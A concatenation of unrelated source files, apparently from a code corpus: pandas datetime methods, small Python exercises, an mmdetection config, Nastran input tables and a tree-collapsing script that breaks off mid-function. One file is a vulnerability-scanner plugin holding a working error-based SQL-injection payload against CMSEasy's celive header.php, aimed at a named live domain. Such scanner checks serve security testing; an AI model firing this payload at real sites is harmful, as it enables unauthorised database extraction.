.. versionadded:: 0.23.0
Parameters
----------
locale : str, optional
Locale determining the language in which to return the month name.
Default is English locale.
Returns
-------
Index
Index of month names.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2018-01', freq='M', periods=3)
>>> idx
DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31'],
dtype='datetime64[ns]', freq='M')
>>> idx.month_name()
Index(['January', 'February', 'March'], dtype='object')
"""
if self.tz is not None and self.tz is not utc:
values = self._local_timestamps()
else:
values = self.asi8
result = fields.get_date_name_field(values, 'month_name',
locale=locale)
result = self._maybe_mask_results(result, fill_value=None)
return result
def day_name(self, locale=None):
"""
Return the day names of the DateTimeIndex with specified locale.
.. versionadded:: 0.23.0
Parameters
----------
locale : str, optional
Locale determining the language in which to return the day name.
Default is English locale.
Returns
-------
Index
Index of day names.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2018-01-01', freq='D', periods=3)
>>> idx
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03'],
dtype='datetime64[ns]', freq='D')
>>> idx.day_name()
Index(['Monday', 'Tuesday', 'Wednesday'], dtype='object')
"""
if self.tz is not None and self.tz is not utc:
values = self._local_timestamps()
else:
values = self.asi8
result = fields.get_date_name_field(values, 'day_name',
locale=locale)
result = self._maybe_mask_results(result, fill_value=None)
return result
@property
def time(self):
"""
Returns numpy array of datetime.time. The time part of the Timestamps.
"""
# If the Timestamps have a timezone that is not UTC,
# convert them into their i8 representation while
# keeping their timezone and not using UTC
if self.tz is not None and self.tz is not utc:
timestamps = self._local_timestamps()
else:
timestamps = self.asi8
return tslib.ints_to_pydatetime(timestamps, box="time")
@property
def timetz(self):
"""
Returns numpy array of datetime.time also containing timezone
information. The time part of the Timestamps.
"""
return tslib.ints_to_pydatetime(self.asi8, self.tz, box="time")
@property
def date(self):
"""
Returns numpy array of python datetime.date objects (namely, the date
part of Timestamps without timezone information).
"""
# If the Timestamps have a timezone that is not UTC,
# convert them into their i8 representation while
# keeping their timezone and not using UTC
if self.tz is not None and self.tz is not utc:
timestamps = self._local_timestamps()
else:
timestamps = self.asi8
return tslib.ints_to_pydatetime(timestamps, box="date")
year = _field_accessor('year', 'Y', "The year of the datetime")
month = _field_accessor('month', 'M',
"The month as January=1, December=12")
day = _field_accessor('day', 'D', "The days of the datetime")
hour = _field_accessor('hour', 'h', "The hours of the datetime")
minute = _field_accessor('minute', 'm', "The minutes of the datetime")
second = _field_accessor('second', 's', "The seconds of the datetime")
microsecond = _field_accessor('microsecond', 'us',
"The microseconds of the datetime")
nanosecond = _field_accessor('nanosecond', 'ns',
"The nanoseconds of the datetime")
weekofyear = _field_accessor('weekofyear', 'woy',
"The week ordinal of the year")
week = weekofyear
_dayofweek_doc = """
The day of the week with Monday=0, Sunday=6.
Return the day of the week. It is assumed the week starts on
Monday, which is denoted by 0 and ends on Sunday which is denoted
by 6. This method is available on both Series with datetime
values (using the `dt` accessor) or DatetimeIndex.
See Also
--------
Series.dt.dayofweek : Alias.
Series.dt.weekday : Alias.
Series.dt.day_name : Returns the name of the day of the week.
Returns
-------
Series or Index
Containing integers indicating the day number.
Examples
--------
>>> s = pd.date_range('2016-12-31', '2017-01-08', freq='D').to_series()
>>> s.dt.dayofweek
2016-12-31 5
2017-01-01 6
2017-01-02 0
2017-01-03 1
2017-01-04 2
2017-01-05 3
2017-01-06 4
2017-01-07 5
2017-01-08 6
Freq: D, dtype: int64
"""
dayofweek = _field_accessor('dayofweek', 'dow', _dayofweek_doc)
weekday = dayofweek
weekday_name = _field_accessor(
'weekday_name',
'weekday_name',
"The name of day in a week (ex: Friday)\n\n.. deprecated:: 0.23.0")
dayofyear = _field_accessor('dayofyear', 'doy',
"The ordinal day of the year")
quarter = _field_accessor('quarter', 'q', "The quarter of the date")
days_in_month = _field_accessor(
'days_in_month',
'dim',
"The number of days in the month")
daysinmonth = days_in_month
_is_month_doc = """
Indicates whether the date is the {first_or_last} day of the month.
Returns
-------
Series or array
For Series, returns a Series with boolean values.
For DatetimeIndex, returns a boolean array.
See Also
--------
is_month_start : Return a boolean indicating whether the date
is the first day of the month.
is_month_end : Return a boolean indicating whether the date
is the last day of the month.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> s = pd.Series(pd.date_range("2018-02-27", periods=3))
>>> s
0 2018-02-27
1 2018-02-28
2 2018-03-01
dtype: datetime64[ns]
>>> s.dt.is_month_start
0 False
1 False
2 True
dtype: bool
>>> s.dt.is_month_end
0 False
1 True
2 False
dtype: bool
>>> idx = pd.date_range("2018-02-27", periods=3)
>>> idx.is_month_start
array([False, False, True])
>>> idx.is_month_end
array([False, True, False])
"""
is_month_start = _field_accessor(
'is_month_start',
'is_month_start',
_is_month_doc.format(first_or_last='first'))
is_month_end = _field_accessor(
'is_month_end',
'is_month_end',
_is_month_doc.format(first_or_last='last'))
is_quarter_start = _field_accessor(
'is_quarter_start',
'is_quarter_start',
"""
Indicator for whether the date is the first day of a quarter.
Returns
-------
is_quarter_start : Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
quarter : Return the quarter of the date.
is_quarter_end : Similar property for indicating the quarter start.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> df = pd.DataFrame({'dates': pd.date_range("2017-03-30",
... periods=4)})
>>> df.assign(quarter=df.dates.dt.quarter,
... is_quarter_start=df.dates.dt.is_quarter_start)
dates quarter is_quarter_start
0 2017-03-30 1 False
1 2017-03-31 1 False
2 2017-04-01 2 True
3 2017-04-02 2 False
>>> idx = pd.date_range('2017-03-30', periods=4)
>>> idx
DatetimeIndex(['2017-03-30', '2017-03-31', '2017-04-01', '2017-04-02'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_quarter_start
array([False, False, True, False])
""")
is_quarter_end = _field_accessor(
'is_quarter_end',
'is_quarter_end',
"""
Indicator for whether the date is the last day of a quarter.
Returns
-------
is_quarter_end : Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
quarter : Return the quarter of the date.
is_quarter_start : Similar property indicating the quarter start.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> df = pd.DataFrame({'dates': pd.date_range("2017-03-30",
... periods=4)})
>>> df.assign(quarter=df.dates.dt.quarter,
... is_quarter_end=df.dates.dt.is_quarter_end)
dates quarter is_quarter_end
0 2017-03-30 1 False
1 2017-03-31 1 True
2 2017-04-01 2 False
3 2017-04-02 2 False
>>> idx = pd.date_range('2017-03-30', periods=4)
>>> idx
DatetimeIndex(['2017-03-30', '2017-03-31', '2017-04-01', '2017-04-02'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_quarter_end
array([False, True, False, False])
""")
is_year_start = _field_accessor(
'is_year_start',
'is_year_start',
"""
Indicate whether the date is the first day of a year.
Returns
-------
Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
is_year_end : Similar property indicating the last day of the year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> dates = pd.Series(pd.date_range("2017-12-30", periods=3))
>>> dates
0 2017-12-30
1 2017-12-31
2 2018-01-01
dtype: datetime64[ns]
>>> dates.dt.is_year_start
0 False
1 False
2 True
dtype: bool
>>> idx = pd.date_range("2017-12-30", periods=3)
>>> idx
DatetimeIndex(['2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_year_start
array([False, False, True])
""")
is_year_end = _field_accessor(
'is_year_end',
'is_year_end',
"""
Indicate whether the date is the last day of the year.
Returns
-------
Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
is_year_start : Similar property indicating the start of the year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> dates = pd.Series(pd.date_range("2017-12-30", periods=3))
>>> dates
0 2017-12-30
1 2017-12-31
2 2018-01-01
dtype: datetime64[ns]
>>> dates.dt.is_year_end
0 False
1 True
2 False
dtype: bool
>>> idx = pd.date_range("2017-12-30", periods=3)
>>> idx
DatetimeIndex(['2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_year_end
array([False, True, False])
""")
is_leap_year = _field_accessor(
'is_leap_year',
'is_leap_year',
"""
Boolean indicator if the date belongs to a leap year.
A leap year is a year, which has 366 days (instead of 365) including
29th of February as an intercalary day.
Leap years are years which are multiples of four with the exception
of years divisible by 100 but not by 400.
Returns
-------
Series or ndarray
Booleans indicating if dates belong to a leap year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> idx = pd.date_range("2012-01-01", "2015-01-01", freq="Y")
>>> idx
DatetimeIndex(['2012-12-31', '2013-12-31', '2014-12-31'],
dtype='datetime64[ns]', freq='A-DEC')
>>> idx.is_leap_year
array([ True, False, False], dtype=bool)
>>> dates = pd.Series(idx)
>>> dates_series
0 2012-12-31
1 2013-12-31
2 2014-12-31
dtype: datetime64[ns]
>>> dates_series.dt.is_leap_year
0 True
1 False
2 False
dtype: bool
""")
def to_julian_date(self):
"""
Convert Datetime Array to float64 ndarray of Julian Dates.
0 Julian date is noon January 1, 4713 BC.
http://en.wikipedia.org/wiki/Julian_day
"""
# http://mysite.verizon.net/aesir_research/date/jdalg2.htm
year = np.asarray(self.year)
month = np.asarray(self.month)
day = np.asarray(self.day)
testarr = month < 3
year[testarr] -= 1
month[testarr] += 12
return (day +
np.fix((153 * month - 457) / 5) +
365 * year +
np.floor(year / 4) -
np.floor(year / 100) +
np.floor(year / 400) +
1721118.5 +
(self.hour +
self.minute / 60.0 +
self.second / 3600.0 +
self.microsecond / 3600.0 / 1e+6 +
self.nanosecond / 3600.0 / 1e+9
) / 24.0)
DatetimeArrayMixin._add_comparison_ops()
DatetimeArrayMixin._add_datetimelike_methods()
def _generate_regular_range(cls, start, end, periods, freq):
"""
Generate a range of dates with the spans between dates described by
the given `freq` DateOffset.
Parameters
----------
cls : class
start : Timestamp or None
first point of produced date range
end : Timestamp or None
last point of produced date range
periods : int
number of periods in produced date range
freq : DateOffset
describes space between dates in produced date range
Returns
-------
ndarray[np.int64] representing nanosecond unix timestamps
"""
if isinstance(freq, Tick):
stride = freq.nanos
if periods is None:
b = Timestamp(start).value
# cannot just use e = Timestamp(end) + 1 because arange breaks when
# stride is too large, see GH10887
e = (b + (Timestamp(end).value - b) // stride * stride +
stride // 2 + 1)
# end.tz == start.tz by this point due to _generate implementation
tz = start.tz
elif start is not None:
b = Timestamp(start).value
e = _generate_range_overflow_safe(b, periods, stride, side='start')
tz = start.tz
elif end is not None:
e = Timestamp(end).value + stride
b = _generate_range_overflow_safe(e, periods, stride, side='end')
tz = end.tz
else:
raise ValueError("at least 'start' or 'end' should be specified "
"if a 'period' is given.")
values = np.arange(b, e, stride, dtype=np.int64)
else:
tz = None
# start and end should have the same timezone by this point
if start is not None:
tz = start.tz
elif end is not None:
tz = end.tz
xdr = generate_range(start=start, end=end,
periods=periods, offset=freq)
values = np.array([x.value for x in xdr], dtype=np.int64)
data = cls._simple_new(values, freq=freq, tz=tz)
return data
def _generate_range_overflow_safe(endpoint, periods, stride, side='start'):
"""
Calculate the second endpoint for passing to np.arange, checking
to avoid an integer overflow. Catch OverflowError and re-raise
as OutOfBoundsDatetime.
Parameters
----------
endpoint : int
periods : int
stride : int
side : {'start', 'end'}
Returns
-------
other_end : int
Raises
------
OutOfBoundsDatetime
"""
# GH#14187 raise instead of incorrectly wrapping around
assert side in ['start', 'end']
if side == 'end':
stride *= -1
try:
other_end = checked_add_with_arr(np.int64(endpoint),
np.int64(periods) * stride)
except OverflowError:
raise tslib.OutOfBoundsDatetime('Cannot generate range with '
'{side}={endpoint} and '
'periods={periods}'
.format(side=side, endpoint=endpoint,
periods=periods))
return other_end
def _infer_tz_from_endpoints(start, end, tz):
"""
If a timezone is not explicitly given via `tz`, see if one can
be inferred from the `start` and `end` endpoints. If more than one
of these inputs provides a timezone, require that they all agree.
Parameters
----------
start : Timestamp
end : Timestamp
tz : tzinfo or None
Returns
-------
tz : tzinfo or None
inferred_tz : tzinfo or None
Raises
------
TypeError : if start and end timezones do not agree
"""
try:
inferred_tz = timezones.infer_tzinfo(start, end)
except Exception:
raise TypeError('Start and end cannot both be tz-aware with '
'different timezones')
inferred_tz = timezones.maybe_get_tz(inferred_tz)
tz = timezones.maybe_get_tz(tz)
if tz is not None and inferred_tz is not None:
if not timezones.tz_compare(inferred_tz, tz):
raise AssertionError("Inferred time zone not equal to passed "
"time zone")
elif inferred_tz is not None:
tz = inferred_tz
return tz, inferred_tz
def _maybe_normalize_endpoints(start, end, normalize):
_normalized = True
if start is not None:
if normalize:
start = normalize_date(start)
_normalized = True
else:
_normalized = _normalized and start.time() == _midnight
if end is not None:
if normalize:
end = normalize_date(end)
_normalized = True
else:
_normalized = _normalized and end.time() == _midnight
return start, end, _normalized
def _maybe_localize_point(ts, is_none, is_not_none, freq, tz):
"""
Localize a start or end Timestamp to the timezone of the corresponding
start or end Timestamp
Parameters
----------
ts : start or end Timestamp to potentially localize
is_none : argument that should be None
is_not_none : argument that should not be None
freq : Tick, DateOffset, or None
tz : str, timezone object or None
Returns
-------
ts : Timestamp
"""
# Make sure start and end are timezone localized if:
# 1) freq = a Timedelta-like frequency (Tick)
# 2) freq = None i.e. generating a linspaced range
if isinstance(freq, Tick) or freq is None:
localize_args = {'tz': tz, 'ambiguous': False}
else:
localize_args = {'tz': None}
if is_none is None and is_not_none is not None:
ts = ts.tz_localize(**localize_args)
return ts
|
the-stack_106_23219 | from adafruit_circuitplayground.express import cpx
# Set to check for single-taps.
cpx.detect_taps = 1
tap_count = 0
# We're looking for 2 single-taps before moving on.
while tap_count < 2:
if cpx.tapped:
print("Single-tap!")
tap_count += 1
print("Reached 2 single-taps!")
# Now switch to checking for double-taps.
tap_count = 0
cpx.detect_taps = 2
# We're looking for 2 double-taps before moving on.
while tap_count < 2:
if cpx.tapped:
print("Double-tap!")
tap_count += 1
print("Reached 2 double-taps!")
cpx.red_led = True
print("Done.")
|
the-stack_106_23220 | import re
def assign(service,arg):
if service == 'cmseasy':
return True,arg
def audit(arg):
url = arg + '/celive/live/header.php'
payload = ("xajax=LiveMessage&xajaxargs[0]=<xjxobj><q><e><k>name</k><v>%27,"
"(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(md5(1))),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20</v></e></q></xjxobj>")
code,head,body,errcode,fina_url=curl.curl('-d "%s" %s'%(payload,url))
if code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('cmseasy','http://www.mldclub.com.cn/')[1])
|
the-stack_106_23224 | # model settings
model = dict(
type='FastRCNN',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
roi_head=dict(
type='StandardRoIHead',
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))),
# model training and testing settings
train_cfg=dict(
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
match_low_quality=False,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)),
test_cfg=dict(
rcnn=dict(
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100)))
|
the-stack_106_23225 | import csv
import os
voter = 0
khan = 0
correy = 0
li = 0
OTooley = 0
# read csv file
with open('Resources/election_data.csv', newline='', encoding="utf-8") as FreeBritney:
# Create variable to store contents of budget_data.csv
Free = csv.reader(FreeBritney, delimiter = ',')
# Start the second row by skipping the first row
Britney = next(FreeBritney)
# Iterate through the rows in the stored file contents
for row in Free:
# Total votes
voter +=1
# IF statement to count number of vote casted for each candidate
if row[2] == "Khan":
khan +=1
elif row[2] == "Correy":
correy +=1
elif row[2] == "Li":
li +=1
elif row[2] == "O'Tooley":
OTooley +=1
# create a dictionary dedicate the list of candidates and number of votes for each candidate
candidates = ["Khan", "Correy", "Li","O'Tooley"]
votes = [khan, correy, li, OTooley]
# We zip them together in a list
# Return the winner using a max function of the dictionary to get the highest percentage of the vote
OopsIDidItAgain = dict(zip(candidates,votes))
Lucky = max(OopsIDidItAgain, key=OopsIDidItAgain.get)
# Print a the summary of the analysis
khan_percent = (khan/voter) *100
correy_percent = (correy/voter) * 100
li_percent = (li/voter) * 100
otooley_percent = (OTooley/voter) * 100
print('Election Results')
print("----------------------------")
print(f"The total number of votes cast is: {voter}")
print("----------------------------")
print(f"Khan: {khan_percent:.3f} % ({khan})")
print(f"Correy: {correy_percent:.3f} % ({correy})")
print(f"Li: {li_percent:.3f} % ({li})")
print(f"O'Tooley: {otooley_percent:.3f} % ({OTooley})")
print("----------------------------")
print(f"The Winner is: {Lucky}")
print(f"----------------------------")
# export a text file with the results.
from pathlib import Path
output = Path("Resources", "Eletion Results.txt")
with open(output,"w") as analysis:
# Print results to txt file
analysis.write("Election Results")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"The total number of votes cast is: {voter}")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"Khan: {khan_percent:.3f} % ({khan})")
analysis.write("\n")
analysis.write(f"Correy: {correy_percent:.3f} % ({correy})")
analysis.write("\n")
analysis.write(f"Li: {li_percent:.3f} % ({li})")
analysis.write("\n")
analysis.write(f"O'Tooley: {otooley_percent:.3f} % ({OTooley})")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"The Winner is: ({Lucky})")
analysis.write("\n")
analysis.write("----------------------------")
|
the-stack_106_23227 | #!/usr/bin/python
"""
The goal of Artificial Intelligence is to create a rational agent (Artificial Intelligence 1.1.4). An agent gets input from the environment through sensors and acts on the environment with actuators. In this challenge, you will program a simple bot to perform the correct actions based on environmental input.
Meet the bot MarkZoid. It's a cleaning bot whose sensor is a head mounted camera and whose actuators are the wheels beneath it. It's used to clean the floor.
The bot here is positioned at the top left corner of a 5*5 grid. Your task is to move the bot to clean all the dirty cells.
Input Format
The first line contains two space separated integers which indicate the current position of the bot.
The board is indexed using Matrix Convention
5 lines follow representing the grid. Each cell in the grid is represented by any of the following 3 characters: 'b' (ascii value 98) indicates the bot's current position, 'd' (ascii value 100) indicates a dirty cell and '-' (ascii value 45) indicates a clean cell in the grid.
Note If the bot is on a dirty cell, the cell will still have 'd' on it.
Output Format
The output is the action that is taken by the bot in the current step, and it can be either one of the movements in 4 directions or cleaning up the cell in which it is currently located. The valid output strings are LEFT, RIGHT, UP and DOWN or CLEAN. If the bot ever reaches a dirty cell, output CLEAN to clean the dirty cell. Repeat this process until all the cells on the grid are cleaned.
Sample Input #00
0 0
b---d
-d--d
--dd-
--d--
----d
Sample Output #00
RIGHT
Resultant state
-b--d
-d--d
--dd-
--d--
----d
Sample Input #01
0 1
-b--d
-d--d
--dd-
--d--
----d
Sample Output #01
DOWN
Resultant state
----d
-d--d
--dd-
--d--
----d
Task
Complete the function next_move that takes in 3 parameters posr, posc being the co-ordinates of the bot's current position and board which indicates the board state to print the bot's next move.
The codechecker will keep calling the function next_move till the game is over or you make an invalid move.
Scoring
Your score is (200 - number of moves the bot makes)/40. CLEAN is considered a move as well.
Once you submit, your bot will be played on four grids with three of the grid configurations unknown to you. The final score will be the sum of the scores obtained in each of the four grids.
Education Links
Introduction to AI by Stuart Russell and Peter Norvig
Motor cognition
Solved score: 17.82pts
Submissions: 20640
Max Score:
17
Difficulty:
Easy
Rate This Challenge:
More
https://www.hackerrank.com/challenges/botclean/problem
"""
# Head ends here
import math
def next_move(posr, posc, board):
dps = []
p = [0,0]
b = [posr,posc]
if board[posr][posc] == 'd':
print("CLEAN")
return
for row in range(len(board)):
for col in range(len(board)):
if board[row][col] == 'd':
dps.append([row, col])
sorted(dps, key = lambda dpos: math.sqrt( ((dpos[1]-b[0])**2) + ((dpos[1]-b[0])**2)))
p = dps[0]
# print(p, b)
# going to the same row
if p[0] > b[0]:
print("DOWN")
return
elif p[0] < b [0]:
print("UP")
return
# going to the same column
if p[1] > b[1]:
print("RIGHT")
return
elif p[1] < b [1]:
print("LEFT")
return
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
|
the-stack_106_23230 | def notas(*notas, sit=False):
"""
-> Função para analisar notas e situações de vários alunos.
:param *notas: uma ou mais notas dos alunos
:param sit: valor opcional, indicando se deve ou não adicionar a situação
:return: dicionário com várias informações sobre a situação da turma
"""
d = {'total': len(notas), 'maior': max(notas), 'menor': min(notas), 'média': sum(notas) / len(notas)}
if sit == True:
if d['média'] < 5: d['situação'] = 'ruim'
elif d['média'] < 7: d['situação'] = 'aceitável'
elif d['média'] < 9: d['situação'] = 'boa'
else: d['situação'] = 'excelente'
return d
resp = notas(5.5, 9.5, 10, 6.5, sit=True)
print(f'\n{resp}\n')
|
the-stack_106_23231 | from __future__ import print_function, absolute_import
from collections import defaultdict
from six.moves import range
from six import iteritems
from h5Nastran.defaults import Defaults
from h5Nastran.h5nastrannode import H5NastranNode
from .input_table import InputTable, TableDef
class Dynamic(H5NastranNode):
def __init__(self, h5n, input):
self._h5n = h5n
self._input = input
self.eigr = EIGR(self._h5n, self)
self.eigrl = EIGRL(self._h5n, self)
self.freq = FREQ(self._h5n, self)
self.freq1 = FREQ1(self._h5n, self)
self.randps = RANDPS(self._h5n, self)
def path(self):
return self._input.path() + ['DYNAMIC']
def to_bdf(self, bdf):
for key, item in iteritems(self.__dict__):
if key.startswith('_'):
continue
try:
item.to_bdf(bdf)
except NotImplementedError:
pass
########################################################################################################################
class EIGR(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/EIGR')
def to_bdf(self, bdf):
add_card = bdf.add_eigr
identity = self.identity
sid = identity['SID']
method = identity['METHOD']
f1 = identity['F1']
f2 = identity['F2']
ne = identity['NE']
nd = identity['ND']
norm = identity['NORM']
g = identity['G']
c = identity['C']
to_value_int = self._h5n.defaults.to_value_int
for i in range(sid.size):
_g = to_value_int(g[i])
_c = to_value_int(c[i])
add_card(sid[i], method[i].decode(), f1[i], f2[i], ne[i], nd[i], norm[i].decode(), _g, _c)
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {'IDENTITY': {'SID': [], 'METHOD': [], 'F1': [], 'F2': [], 'NE': [], 'ND': [], 'NORM': [],
'G': [], 'C': [], 'DOMAIN_ID': []}}
identity = result['IDENTITY']
sid = identity['SID']
method = identity['METHOD']
f1 = identity['F1']
f2 = identity['F2']
ne = identity['NE']
nd = identity['ND']
norm = identity['NORM']
g = identity['G']
c = identity['C']
get_value_int = self._h5n.defaults.get_value_int
for card_id in card_ids:
card = cards[card_id]
sid.append(card.sid)
method.append(card.method)
f1.append(card.f1)
f2.append(card.f2)
ne.append(get_value_int(card.ne))
nd.append(get_value_int(card.nd))
norm.append(card.norm)
g.append(get_value_int(card.G))
c.append(get_value_int(card.C))
return result
########################################################################################################################
class EIGRL(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/EIGRL/IDENTITY')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
freqs = {'IDENTITY': {'FI': []}}
result = {'IDENTITY': {'SID': [], 'V1': [], 'V2': [], 'ND': [], 'MSGLVL': [], 'MAXSET': [],
'SHFSCL': [], 'FLAG1': [], 'FLAG2': [], 'NORM': [], 'ALPH': [], 'FREQS_POS': [],
'FREQS_LEN': [], 'DOMAIN_ID': []},
'FREQS': freqs,
'_subtables': ['FREQS']}
fi = freqs['IDENTITY']['FI']
identity = result['IDENTITY']
sid = identity['SID']
v1 = identity['V1']
v2 = identity['V2']
nd = identity['ND']
msglvl = identity['MSGLVL']
maxset = identity['MAXSET']
shfscl = identity['SHFSCL']
flag1 = identity['FLAG1']
flag2 = identity['FLAG2']
norm = identity['NORM']
alph = identity['ALPH']
freqs_pos = identity['FREQS_POS']
freqs_len = identity['FREQS_LEN']
def _get_option(val, option, option_data, default):
if val in ('', None):
val = option_data.get(option, None)
if val is None:
val = default
return val
_pos = 0
for card_id in card_ids:
card = cards[card_id]
option_data = defaultdict(list)
for i in range(len(card.options)):
option_data[card.options[i]].append(card.values[i])
_v1 = _get_option(card.v1, 'V1', option_data, Defaults.default_double)
_v2 = _get_option(card.v2, 'V2', option_data, Defaults.default_double)
_nd = _get_option(card.nd, 'ND', option_data, Defaults.default_int)
_msglvl = _get_option(card.msglvl, 'MSGLVL', option_data, Defaults.default_int)
_maxset = _get_option(card.maxset, 'MAXSET', option_data, Defaults.default_int)
_shfscl = _get_option(card.shfscl, 'SHFSCL', option_data, Defaults.default_double)
_norm = _get_option(card.norm, 'NORM', option_data, Defaults.default_str)
_alph = _get_option(None, 'ALPH', option_data, Defaults.default_double)
# TODO: EIGRL how is nums used?, what is flag1 and flag2?
# _nums = _get_option(None, 'NUMS', option_data, 1)
_fi = _get_option(None, 'Fi', option_data, [])
sid.append(card.sid)
v1.append(_v1)
v2.append(_v2)
nd.append(_nd)
msglvl.append(_msglvl)
maxset.append(_maxset)
shfscl.append(_shfscl)
norm.append(_norm)
alph.append(_alph)
flag1.append(Defaults.unknown_int)
flag2.append(Defaults.unknown_int)
freqs_pos.append(_pos)
_len = len(_fi)
_pos += _len
freqs_len.append(_len)
fi += _fi
return result
########################################################################################################################
class FREQ(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/FREQ/IDENTITY')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
freqs = {'IDENTITY': {'F': []}}
result = {'IDENTITY': {'SID': [], 'FREQS_POS': [], 'FREQS_LEN': [], 'DOMAIN_ID': []},
'FREQS': freqs,
'_subtables': ['FREQS']}
f = freqs['IDENTITY']['F']
identity = result['IDENTITY']
sid = identity['SID']
freqs_pos = identity['FREQS_POS']
freqs_len = identity['FREQS_LEN']
pos = 0
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
freqs_pos.append(pos)
_len = len(card.freqs)
freqs_len.append(_len)
pos += _len
f.extend(card.freqs)
return result
########################################################################################################################
class FREQ1(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/FREQ1')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {'IDENTITY': {'SID': [], 'F1': [], 'DF': [], 'NDF': [], 'DOMAIN_ID': []}}
identity = result['IDENTITY']
sid = identity['SID']
f1 = identity['F1']
df = identity['DF']
ndf = identity['NDF']
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
f1.append(card.f1)
df.append(card.df)
ndf.append(card.ndf)
return result
########################################################################################################################
class RANDPS(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/RANDPS')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {
'IDENTITY': {'SID': [], 'J': [], 'K': [], 'X': [], 'Y': [], 'TID': [], 'DOMAIN_ID': []}
}
i = result['IDENTITY']
sid = i['SID']
j = i['J']
k = i['K']
x = i['X']
y = i['Y']
tid = i['TID']
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
j.append(card.j)
k.append(card.k)
x.append(card.x)
y.append(card.y)
tid.append(card.tid)
return result
|
the-stack_106_23232 | #!/usr/local/env python3
__author__ = 'duceppemo'
__version__ = '0.1'
"""
https://www.biostars.org/p/97409/
"""
from ete3 import Tree
from argparse import ArgumentParser
class TreeCollapser(object):
def __init__(self, args):
# Arguments
self.input_tree = args.input
self.output_tree = args.output
self.dist = args.distance
# Run
self.run()
def run(self):
# Parse tree file (Newick format)
t = Tree(self.input_tree)
# Now collapse nodes with distance smaller than
TreeCollapser.collapse(t, self.dist)
# Collapsed nodes are labeled, so you locate them and prune them
for node in t.search_nodes(collapsed=True):
for child in node.get_children():
child.detach()
# Write new collapsed tree to file
t.write(format=1, outfile=self.output_tree)
@staticmethod
def mean(array):
return sum(array)/float(len(array))
@staticmethod
def cache_distances(tree):
"""
precalculate distances of all nodes to the root
"""
node2rootdist = {tree: 0}
for node in tree.iter_descendants('preorder'):
node2rootdist[node] = node.dist + node2rootdist[node.up]
return node2rootdist
@staticmethod
def collapse(tree, min_dist):
# cache the tip content of each node to reduce the number of times the tree is traversed
node2tips = tree.get_cached_content()
root_distance = TreeCollapser.cache_distances(tree)
for node in tree.get_descendants('preorder'):
